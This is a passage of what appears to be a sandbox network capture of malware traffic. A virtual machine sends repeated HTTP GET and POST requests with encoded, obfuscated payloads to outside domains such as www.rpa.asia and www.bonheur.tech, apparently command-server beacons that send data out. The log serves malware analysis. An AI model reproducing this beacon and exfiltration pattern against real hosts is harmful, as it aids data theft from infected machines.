                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 43 33 66 61 59 6b 55 63 35 72 38 55 6b 4b 48 57 44 33 64 74 42 65 53 49 38 56 7a 64 64 67 53 47 33 4a 32 67 50 43 66 63 74 32 77 33 4b 77 75 58 4f 51 61 52 4b 36 32 71 43 67 4b 36 69 7a 51 51 52 33 50 6e 4e 74 35 33 33 78 38 64 2b 44 38 38 71 56 72 74 6c 2f 33 6e 6f 76 42 58 30 6d 41 6b 32 56 35 4a 33 58 39 4f 74 57 37 4e 6c 78 63 4a 58 6c 4d 75 2f 39 6e 30 63 6f 67 39 6c 73 4c 46 66 6a 77 6d 67 49 42 77 67 4f 6b 54 6b 78 2f 47 7a 6a 35 35 49 55 76 34 73 6c 44 34 61 4f 31 64 6e 36 4b 2f 46 5a 56 58 6d 65 39 51 7a 37 4c 37 6d 46 78 30 6c 33 51 49 4a 30 32 2f 36 4e 33 45 45 4d 68 4b 46 6d 70 63 4b 33 51 66 54 7a 37 59 61 66 62 6a 6a 61 7a 7a 34 61 36 59 68 5a 2f 50 52 6c 33 70 35 70 34 51 65 59 36 34 31 76 32 5a 62 66 79 64 4a 31 64 66 32 72 73 69 46 63 58 42 6e 77 37 72 54 34 69 52 67 6b 77 71 42 57 38 45 73 77 4b 6f 6c 4d 6f 55 33 2f 6f 58 54 51 64 49 4f 61 68 4f 4c 52 45 2f 5a 58 5a 6d 69 6e 46 4c 30 73 50 54 6f 53 4f 33 44 65 42 75 73 4b 49 66 6a 48 71 30 74 5a 34 68 4a 45 61 [TRUNCATED]
                                                                                    Data Ascii: 6B-l7F=C3faYkUc5r8UkKHWD3dtBeSI8VzddgSG3J2gPCfct2w3KwuXOQaRK62qCgK6izQQR3PnNt533x8d+D88qVrtl/3novBX0mAk2V5J3X9OtW7NlxcJXlMu/9n0cog9lsLFfjwmgIBwgOkTkx/Gzj55IUv4slD4aO1dn6K/FZVXme9Qz7L7mFx0l3QIJ02/6N3EEMhKFmpcK3QfTz7Yafbjjazz4a6YhZ/PRl3p5p4QeY641v2ZbfydJ1df2rsiFcXBnw7rT4iRgkwqBW8EswKolMoU3/oXTQdIOahOLRE/ZXZminFL0sPToSO3DeBusKIfjHq0tZ4hJEaiilHmTTtD38ZGYUDM/e+hD/aMayxD5WffjOlR+OlJNk7GbIkughJUgh7xbpdD2z+cQYtEyWkzxtK34F0llOeZEevfNva/AwY/8YRHU+T1l+5SJSDev/R6wdyDmN6dBmgMb3SGyfy2DzWD99knLlkU5Ln5auYrOtk0u/vkLhgVd56DicIPZnt/lrqDdu5eur8olMVQE1xxmFRtQ89fQUOALSBerdr2Q8gWpbud3r7K78aL9VCJ5FwHkDAoppf9fJzKXf4z6E6Tm7er9Iqd1L/QnbiEVvbnAOeljtvf6XoiMFus4Yf9Um72Bcaa8qQper6F64IdmexJ80qX0YST+S5WY8+qi+62dJeNv0DmhMP3hyGbMBsaMibcpVVewsDNpLXTrvGH5NcCkhqhV5vHntWgHr0ZkZl/KrgSC7NzWF6mnVvNRuXROwHMFLzjATylER94zk8KTZSMigRk2y4d+MEtQxkag7O2h1YfKCXQ34b+TU/MRprtGeFOJKKOiCFKWCnUumUaQbZF0l+MZ2n3aKGwrzHI7zV6g3U7JggiYEqD3a0V02eZb1WOFtDeNgtFTKO5qhkW5dgrkOqYZFqJk0ziLNEZVU7QQRiyhMfu72pWAgNYyYyQs8E9Ymf7GjLbMFVkBUuF94ELLf4pj9Is8xzzxr4VQHd702bYU [TRUNCATED]
                                                                                    Jan 9, 2025 16:58:48.303730965 CET73INHTTP/1.1 405 Method Not Allowed
                                                                                    content-length: 0
                                                                                    connection: close


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    73192.168.11.304989813.248.169.4880
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 9, 2025 16:58:50.847191095 CET535OUTGET /t3iv/?80k=lRapCPMXgDk&6B-l7F=P136bSYw/boin6uqIxZ+PLa4sXTYWAHk9qKLeTmXrWAePyaHTSDMFoauBTWx0ig1S3CVFsx30iUtjRVQiBy55I3Yp99Gh3kk8H5H2CMMqknG4ydwL3V23OA= HTTP/1.1
                                                                                    Host: www.bonheur.tech
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Jan 9, 2025 16:58:50.986644030 CET379INHTTP/1.1 200 OK
                                                                                    content-type: text/html
                                                                                    date: Thu, 09 Jan 2025 15:58:50 GMT
                                                                                    content-length: 258
                                                                                    connection: close
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 38 30 6b 3d 6c 52 61 70 43 50 4d 58 67 44 6b 26 36 42 2d 6c 37 46 3d 50 31 33 36 62 53 59 77 2f 62 6f 69 6e 36 75 71 49 78 5a 2b 50 4c 61 34 73 58 54 59 57 41 48 6b 39 71 4b 4c 65 54 6d 58 72 57 41 65 50 79 61 48 54 53 44 4d 46 6f 61 75 42 54 57 78 30 69 67 31 53 33 43 56 46 73 78 33 30 69 55 74 6a 52 56 51 69 42 79 35 35 49 33 59 70 39 39 47 68 33 6b 6b 38 48 35 48 32 43 4d 4d 71 6b 6e 47 34 79 64 77 4c 33 56 32 33 4f 41 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?80k=lRapCPMXgDk&6B-l7F=P136bSYw/boin6uqIxZ+PLa4sXTYWAHk9qKLeTmXrWAePyaHTSDMFoauBTWx0ig1S3CVFsx30iUtjRVQiBy55I3Yp99Gh3kk8H5H2CMMqknG4ydwL3V23OA="}</script></head></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    74192.168.11.3049899160.25.166.12380
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 9, 2025 16:58:56.367445946 CET787OUTPOST /bwjl/ HTTP/1.1
                                                                                    Host: www.rpa.asia
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 203
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.rpa.asia
                                                                                    Referer: http://www.rpa.asia/bwjl/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 4f 6e 2f 30 55 6b 30 67 4b 6c 63 67 78 7a 39 6d 75 4f 35 64 48 50 31 76 52 6e 35 43 38 56 44 71 6a 50 65 4b 42 58 6e 66 38 50 4a 78 2b 34 2f 75 68 69 7a 41 35 62 35 36 52 46 57 4d 6e 71 52 37 6b 69 6c 32 34 4d 4a 53 32 63 78 4d 30 55 44 4e 32 67 74 66 6a 68 74 57 56 6f 35 4a 61 48 50 5a 63 31 4b 7a 6f 77 78 4e 41 46 73 53 4c 4d 48 33 5a 51 58 78 68 4a 54 51 49 52 48 72 2f 30 37 6a 42 39 72 68 31 6c 36 52 67 70 66 43 6b 2f 45 75 6d 66 72 7a 75 72 48 30 36 47 4a 6b 48 30 39 44 58 75 62 6b 36 58 4a 65 47 56 2b 42 72 75 4a 41 67 47 4b 30 43 62 63 6f 34 57 76 37 4a 63 61 31 7a 41 3d 3d
                                                                                    Data Ascii: 6B-l7F=On/0Uk0gKlcgxz9muO5dHP1vRn5C8VDqjPeKBXnf8PJx+4/uhizA5b56RFWMnqR7kil24MJS2cxM0UDN2gtfjhtWVo5JaHPZc1KzowxNAFsSLMH3ZQXxhJTQIRHr/07jB9rh1l6RgpfCk/EumfrzurH06GJkH09DXubk6XJeGV+BruJAgGK0Cbco4Wv7Jca1zA==
                                                                                    Jan 9, 2025 16:58:56.719484091 CET1289INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Thu, 09 Jan 2025 15:58:56 GMT
                                                                                    server: LiteSpeed
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(25 [TRUNCATED]
                                                                                    Jan 9, 2025 16:58:56.719491959 CET200INData Raw: 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e
                                                                                    Data Ascii: powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    75192.168.11.3049900160.25.166.12380
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 9, 2025 16:58:59.261226892 CET807OUTPOST /bwjl/ HTTP/1.1
                                                                                    Host: www.rpa.asia
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 223
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.rpa.asia
                                                                                    Referer: http://www.rpa.asia/bwjl/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 4f 6e 2f 30 55 6b 30 67 4b 6c 63 67 6a 43 4e 6d 68 4e 52 64 47 76 31 73 66 48 35 43 70 6c 44 6d 6a 50 61 4b 42 56 4c 50 38 39 64 78 39 63 7a 75 67 67 4c 41 38 62 35 36 65 6c 58 49 34 36 51 57 6b 69 68 45 34 4a 70 53 32 63 6c 4d 30 56 7a 4e 32 54 46 63 78 42 74 55 4f 34 35 48 55 6e 50 5a 63 31 4b 7a 6f 77 4d 67 41 45 45 53 49 38 33 33 61 78 58 79 73 70 54 54 66 68 48 72 70 30 37 76 42 39 71 30 31 6b 6d 37 67 76 44 43 6b 2b 30 75 6d 4f 72 77 67 72 48 74 30 6d 49 4d 50 47 30 37 4f 2b 2f 6d 71 47 38 48 48 41 36 6c 6a 5a 6b 61 39 46 2b 32 52 37 67 46 6b 58 43 54 4c 65 62 75 75 49 4d 33 39 57 2f 6c 49 64 2f 76 36 62 68 50 55 6f 63 66 6d 39 49 3d
                                                                                    Data Ascii: 6B-l7F=On/0Uk0gKlcgjCNmhNRdGv1sfH5CplDmjPaKBVLP89dx9czuggLA8b56elXI46QWkihE4JpS2clM0VzN2TFcxBtUO45HUnPZc1KzowMgAEESI833axXyspTTfhHrp07vB9q01km7gvDCk+0umOrwgrHt0mIMPG07O+/mqG8HHA6ljZka9F+2R7gFkXCTLebuuIM39W/lId/v6bhPUocfm9I=
                                                                                    Jan 9, 2025 16:58:59.607426882 CET1289INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Thu, 09 Jan 2025 15:58:59 GMT
                                                                                    server: LiteSpeed
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(25 [TRUNCATED]
                                                                                    Jan 9, 2025 16:58:59.607434988 CET200INData Raw: 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e
                                                                                    Data Ascii: powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    76192.168.11.3049901160.25.166.12380
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 9, 2025 16:59:02.153439999 CET2578OUTPOST /bwjl/ HTTP/1.1
                                                                                    Host: www.rpa.asia
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 3339
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.rpa.asia
                                                                                    Referer: http://www.rpa.asia/bwjl/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 4f 6e 2f 30 55 6b 30 67 4b 6c 63 67 6a 43 4e 6d 68 4e 52 64 47 76 31 73 66 48 35 43 70 6c 44 6d 6a 50 61 4b 42 56 4c 50 38 39 6c 78 39 70 76 75 69 42 4c 41 2f 62 35 36 58 46 58 4c 34 36 52 55 6b 6b 4a 41 34 4a 74 6f 32 66 64 4d 79 33 4c 4e 77 69 46 63 6f 78 74 55 52 6f 35 4b 61 48 4f 52 63 30 36 33 6f 32 73 67 41 45 45 53 49 2b 76 33 4e 77 58 79 71 70 54 51 49 52 48 6e 2f 30 37 4c 42 39 69 6b 31 6b 69 42 67 70 58 43 6b 4e 4d 75 68 38 44 77 67 72 48 74 72 47 49 4e 50 47 6f 32 4f 2b 33 79 71 48 31 38 45 30 36 6c 68 75 52 61 6c 52 32 58 49 70 30 75 34 7a 50 6b 43 76 76 39 78 4c 63 46 34 77 6e 6b 42 75 6a 4d 38 64 6c 69 41 61 63 4a 6b 59 72 71 6a 52 36 73 65 6a 79 72 78 65 38 61 39 6c 38 30 33 6c 38 32 62 2b 47 65 70 77 4c 36 4e 49 66 41 53 50 69 44 6a 78 6b 6b 31 54 4e 52 34 4f 62 6a 45 74 59 69 68 31 31 37 37 57 43 62 2b 56 6f 33 71 52 46 66 53 39 5a 66 65 78 67 56 32 41 30 72 61 33 55 43 68 46 59 51 35 64 38 78 33 6c 75 38 6f 55 61 6c 53 58 64 50 63 53 2b 6c 76 6c 6f 41 59 7a 6e [TRUNCATED]
                                                                                    Data Ascii: 6B-l7F=On/0Uk0gKlcgjCNmhNRdGv1sfH5CplDmjPaKBVLP89lx9pvuiBLA/b56XFXL46RUkkJA4Jto2fdMy3LNwiFcoxtURo5KaHORc063o2sgAEESI+v3NwXyqpTQIRHn/07LB9ik1kiBgpXCkNMuh8DwgrHtrGINPGo2O+3yqH18E06lhuRalR2XIp0u4zPkCvv9xLcF4wnkBujM8dliAacJkYrqjR6sejyrxe8a9l803l82b+GepwL6NIfASPiDjxkk1TNR4ObjEtYih1177WCb+Vo3qRFfS9ZfexgV2A0ra3UChFYQ5d8x3lu8oUalSXdPcS+lvloAYzncDmJc9a+uVVJcviBJlqCatS/Kd3Cwkeu7S2ikLafNUHHDRAUwZeEdOCkujulYzKH4RKZ3MLSmm74jZVOjaLUz/XwDC43zkx5zf7A2Le3lqs5REb5BxZYWgqu44jwmb71HwqduGZzWYuOeIb8yQuviwD4E5kPOvpQzov1N1FyKeTXQuwBHCRj8luzmM4PV8iWqf4WHZ6Gkj6FWkXJS+erg7AxstXkJOI8ujkysQsgKn6UzHWJpvpFfzZdqXS7CjjkfzkNCk915PNreSd4a8kFjmWWyJJN5KnRFZA7K9QcitJgWtYMy9NSo9G+5yRLyoGvvDhGFQU1A/2UdUNZcr7AAwHa/STI3azCl2UYdIlx7il6VC5fyWNjzlqtSZdlTr2rXSvVcTX967AsT0uPsvZa184HEMuCk3yyHYC6TFa7yF08BtAY5jYBF588Xwd48Wy2/cEsLlrmU4KBS/OJSXOlnMHutdE+VuXEcyDcqjDC0DkKrqtrOCPWdg35+ejjW50uD4zSGJyxK9S160mPnLUE1dLnMKKN/M1uSj0Nvd4kkNR7UWPDEpMtv7AV01B25ipraOrUvUgUyZ0fzvQQFb7L4ALyJKg5fdWFb4OmkILcI57hEF0QbJq6evMc0Mty3ydZuWMNcMn3gRKpelWnY7dkAHc+IrPaQahOIs [TRUNCATED]
                                                                                    Jan 9, 2025 16:59:02.153476000 CET1346OUTData Raw: 51 54 79 39 39 6c 70 65 68 7a 33 62 4f 31 69 70 6d 79 63 4a 41 56 45 64 72 4f 35 63 6c 79 52 51 41 61 65 71 6c 2b 6c 53 61 59 64 32 78 76 36 47 6e 76 68 2b 34 76 47 30 2f 2b 6f 75 6a 69 6f 31 70 45 51 75 76 65 39 57 43 50 30 74 78 4b 4b 6b 68 38
                                                                                    Data Ascii: QTy99lpehz3bO1ipmycJAVEdrO5clyRQAaeql+lSaYd2xv6Gnvh+4vG0/+oujio1pEQuve9WCP0txKKkh87NEDCELPCh0ATbOFvPBOkEUFyWGsllWWgIIocZdsjxbLFfRS3xJrjoge8+dovTyhkPfG7LjCDsC57MU6Pxo3KNAVxdlv3tzj1Z5Xj6uwKiczT7dlwgDyeZIIAADi4Wq48A9O1Vq8QT3dUu+0bbvvxGm++tgkDgUMv
                                                                                    Jan 9, 2025 16:59:02.498395920 CET1289INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Thu, 09 Jan 2025 15:59:02 GMT
                                                                                    server: LiteSpeed
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(25 [TRUNCATED]
                                                                                    Jan 9, 2025 16:59:02.498403072 CET200INData Raw: 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e
                                                                                    Data Ascii: powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    77192.168.11.3049902160.25.166.12380
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 9, 2025 16:59:05.045717001 CET531OUTGET /bwjl/?6B-l7F=DlXUXSIcZnIsgzlziINoOaBHIWRz+kGepY2CMnKH5/Z+wLXeqyLz34dEMj2dm6NLuVk54f0N3OpI5VHZ7BJAsS5zdqtXFQ+nWWO+v1ALJkcTW8WFFCOZqPs=&80k=lRapCPMXgDk HTTP/1.1
                                                                                    Host: www.rpa.asia
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Jan 9, 2025 16:59:05.402046919 CET1289INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Thu, 09 Jan 2025 15:59:05 GMT
                                                                                    server: LiteSpeed
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 